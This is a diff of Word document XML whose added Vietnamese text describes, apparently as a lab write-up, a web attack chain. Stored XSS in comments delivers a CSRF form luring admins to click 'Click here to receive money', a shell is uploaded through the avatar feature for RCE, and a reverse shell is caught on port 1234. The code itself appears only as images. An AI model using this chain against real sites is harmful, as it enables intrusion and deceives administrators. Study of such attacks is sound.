+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3064510"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Khi này, reload lại trang thì chúng ta sẽ thấy lỗ hổng XSS đã được khai thác:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CC4E97F" wp14:editId="498E68CE">
+            <wp:extent cx="5943600" cy="3183255"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3183255"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Trong ứng dụng này, tài khoản có quyền admin sẽ có chức năng upload avatar:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1436B72C" wp14:editId="4ECF76E9">
+            <wp:extent cx="5943600" cy="3179445"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="6" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3179445"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Ta sẽ tận dụng chức năng này</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> để upload lên một file shell nhằm thực hiện RCE.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Để thực hiện điều đó, ta sẽ khai thác stored XSS ở phần Comment để tạo ra một CSRF form và dụ các tài khoản admin click vào đó.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Đây là đoạn code để tạo CSRF form và thực hiện RCE khi admin click v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ào</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C377896" wp14:editId="292BE1BE">
+            <wp:extent cx="5943600" cy="3437255"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3437255"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Sử dụng Burp Suite với đoạn code trên để tạo CSRF form:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C80CF50" wp14:editId="20C0F969">
+            <wp:extent cx="5943600" cy="3093720"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="10" name="Picture 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3093720"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Sau khi tạo thành công, đây là giao diện của CSRF form:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="589CC4F8" wp14:editId="7B9B3632">
+            <wp:extent cx="5943600" cy="3194685"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="11" name="Picture 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3194685"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>2. Xâm nhập hệ thống</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Ở trên máy attacker, ta sẽ thực hiện lắng nghe ở port 1234:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24388C02" wp14:editId="1FEC8DF2">
+            <wp:extent cx="3105583" cy="819264"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="9" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3105583" cy="819264"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Khi bất kì người dùng nào có quyền admin click vào nút </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>‘Click here to receive money’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, chúng ta sẽ thành công kết nối </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">reverse </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57A98268" wp14:editId="1CFCBD55">
+            <wp:extent cx="5134692" cy="1457528"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
+            <wp:docPr id="8" name="Picture 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5134692" cy="1457528"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -550,6 +1667,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="006C3ED7"/>
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
